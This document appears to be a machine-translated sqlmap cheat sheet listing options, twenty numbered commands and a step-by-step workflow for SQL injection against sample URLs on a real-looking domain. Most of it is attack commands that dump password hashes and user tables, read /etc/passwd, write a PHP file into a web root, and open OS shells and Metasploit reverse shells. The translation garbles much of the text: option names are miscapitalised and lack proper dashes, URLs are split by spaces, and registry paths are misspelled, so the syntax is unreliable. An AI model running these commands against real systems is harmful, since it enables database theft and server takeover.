-U # injection point
-F # fingerprint the database type
-B # obtain database version information
-P # specify the testable parameters (? Page = 1 & id = 2-p "page, Id ")
-D "" # specify the Database Name
-T "" # specify the table name
-C "" # specify Fields
-S "" # save the session to a file so an interrupted run can be resumed later (save: -s "XX.log"; resume: -s "XX.log" -resume)
-Columns # list fields
-Current-user # Get the current user name
-Current-DB # Get the current database name
-Users # list all database users
-Passwords # all passwords of database users
-Privileges # view the permissions of a user (-privileges -u root)
-U # specify database users
-DBS # list all databases
-Tables-d "" # list tables in the specified database
-Columns-T "user"-d "MySQL" # list all fields of the User table in the MySQL database
-Dump-all # list all tables in all databases
-Exclude-sysdbs # only list user-created databases and tables (skip system databases)
-Dump-T ""-d ""-c "" # list the data of fields in the table of the specified database (-dump-T users-D master-C surname)
-Dump-T ""-d ""-Start 2-Top 4 # list the data of 2-4 fields in the table of the specified database
-DBMS # specifies the database (MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, SQLite, Firebird, Sybase, SAP MaxDB)
-OS # specify the system (Linux, Windows)
-V # verbosity level (0-6)
0: only Python tracebacks, errors and critical messages are shown.
1: displays information and warning messages.
2: displays debugging messages.
3: payload injection.
4: displays HTTP requests.
5: displays HTTP response headers.
6: displays the content of the HTTP response page.
-Privileges # view Permissions
-Is-DBA # whether it is a database administrator
-Roles # enumerate Database User Roles
-UDF-inject # import user-defined functions (obtain system permissions)
-Union-check # whether Union injection is supported
-Union-cols # Union queries table records
-Union-test # Union statement Test
-Union-use # use Union Injection
-Union-tech orderby # union and order
-Method "Post"-Data "" # submit data in post mode (-method "Post"-Data "page = 1 & id = 2 ″)
-Cookie "separated by" # cookie injection (-Cookies = "PHPSESSID = mvijocbglq6pi463rlgk1e4v52; security = low ")
-Referer "" # Use Referer spoofing (-Referer "http://www.baidu.com ")
-User-Agent "" # Custom User-Agent
-Proxy "http: // 127.0.0.1: 8118" # proxy Injection
-String "" # specify a keyword
-Threads # multithreading (-threads 3)
-SQL-shell # Run the specified SQL command
-SQL-query # Run the specified SQL statement (-SQL-query "select password from mysql. User where user = 'root' limit 0, 1 ″)
-File-read # Read a specified file
-File-write # Write the local file (-file-Write/test/test.txt-file-Dest/var/www/html/1.txt.pdf writes the corresponding test.txtfile to the target 1.txt file)
-File-Dest # absolute path of the file to be written
-OS-cmd = ID # Run the system command
-OS-shell # system interaction Shell
-OS-pwn # reverse shell (-OS-pwn-MSF-Path =/opt/framework/msf3 /)
-MSF-Path = # absolute path of Metasploit (-MSF-Path =/opt/framework/msf3 /)
-OS-smbrelay #
-OS-Bof #
-Reg-read # Read the Windows Registry
-Priv-ESC #
-Time-sec = # delay in seconds used for time-based tests (e.g. -time-sec = 5 for 5 seconds)
-P "User-Agent"-User-Agent "sqlmap/0.7rc1 (http://sqlmap.sourceforge.net)" # specify User-Agent Injection
-ETA # Blind Injection
/Pentest/database/sqlmap/TXT/
Common-columns.txt field dictionary
Common-outputs.txt
Common-tables.txt table dictionary
Keywords.txt
Oracle-default-passwords.txt
User-agents.txt
Wordlist.txt
Common commands
1.
./Sqlmap. py-u http://www.91ri.org/test. php? P = 2-F-B-current-user-current-db-users-passwords-DBS-V 0
2.
./Sqlmap. py-u http://www.91ri.org/test. php? P = 2-B-passwords-u root-Union-use-V 2
3.
./Sqlmap. py-u http://www.91ri.org/test. php? P = 2-B-dump-T users-C username-D userdb-Start 2-Stop 3-V 2
4.
./Sqlmap. py-u http://www.91ri.org/test. php? P = 2-B-dump-C "user, pass"-V 1-exclude-sysdbs
5.
./Sqlmap. py-u http://www.91ri.org/test. php? P = 2-B-SQL-shell-V 2
6.
./Sqlmap. py-u http://www.91ri.org/test. php? P = 2-B-file-read "C: \ Boot. ini"-V 2
7.
./Sqlmap. py-u http://www.91ri.org/test. php? P = 2-B-file-Write/test/test.txt-file-Dest/var/www/html/1.txt-V 2
8.
./Sqlmap. py-u http://www.91ri.org/test. php? P = 2-B-OS-cmd "ID"-V 1
9.
./Sqlmap. py-u http://www.91ri.org/test. php? P = 2-B-OS-shell-Union-use-V 2
10.
./Sqlmap. py-u http://www.91ri.org/test. php? P = 2-B-OS-pwn-MSF-Path =/opt/framework/msf3-priv-ESC-V 1
11.
./Sqlmap. py-u http://www.91ri.org/test. php? P = 2-B-OS-pwn-MSF-Path =/opt/framework/msf3-V 1
12.
./Sqlmap. py-u http://www.91ri.org/test. php? P = 2-B-OS-Bof-MSF-Path =/opt/framework/msf3-V 1
13.
./Sqlmap. py-u http://www.91ri.org/test. php? P = 2-reg-add-reg-Key = "hkey_local_nachine \ sofeware \ sqlmap"-reg-value = test-reg-type = REG_SZ-reg-Data = 1
14.
./Sqlmap. py-u http://www.91ri.org/test. php? P = 2-B-ETA
15.
./Sqlmap. py-U "http://www.91ri.org/sqlmap/MySQL/get_str_brackets.php? Id = 1 "-p id-prefix" ') "-suffix" and ('abc' = 'abc"
16.
./Sqlmap. py-U "http://www.91ri.org/sqlmap/MySQL/basic/get_int.php? Id = 1 "-auth-type basic-auth-cred" testuser: testpass"
17.
./Sqlmap. py-l burp. Log-scope = "(WWW )? \. Target \. (COM | net | org )"
18.
./Sqlmap. py-U "http://www.91ri.org/sqlmap/MySQL/get_int.php? Id = 1 "-tamper/between. py, tamper/randomcase. py, tamper/space2comment. py-V 3
19.
./Sqlmap. py-U "http://www.91ri.org/sqlmap/MSSQL/get_int.php? Id = 1 "-SQL-query" select 'foo' "-V 1
20.
./Sqlmap. py-U "http://www.91ri.org/MySQL/get_int_4.php? Id = 1 "-common-tables-D testdb-Banner
Basic workflow
1. Read the database version, current user, current database
Sqlmap-u http://www.91ri.org/test. php? P = 2-F-B-current-user-current-db-V 1
2. Determine the privileges of the current database user
Sqlmap-u http://www.91ri.org/test. php? P = 2-privileges-u username-V 1
Sqlmap-u http://www.91ri.org/test. php? P = 2-is-DBA-u username-V 1
3. Read the password hashes of all database users, or of a specified user
Sqlmap-u http://www.91ri.org/test. php? P = 2-users-passwords-V 2
Sqlmap-u http://www.91ri.org/test. php? P = 2-passwords-u root-V 2
4. Retrieve all databases
Sqlmap-u http://www.91ri.org/test. php? P = 2-DBS-V 2
5. Retrieve all tables in the specified database
Sqlmap-u http://www.91ri.org/test. php? P = 2-tables-D mysql-V 2
6. Obtain the columns of the specified table in the specified database
Sqlmap-u http://www.91ri.org/test. php? P = 2-columns-D mysql-T users-V 2
7. Obtain the data of the specified columns in the specified table and database
Sqlmap-u http://www.91ri.org/test. php? P = 2-dump-D mysql-T users-C "username, password"-s "sqlnmapdb. Log"-V 2
8. File-read: read a file from the server
Sqlmap-u http://www.91ri.org/test. php? P = 2-file-read "/etc/passwd"-V 2
9. File-write the file to the Web
Sqlmap-u http://www.91ri.org/test. php? P = 2-file-Write/localhost/mm. php-file-Dest/var/www/html/XX. php-V 2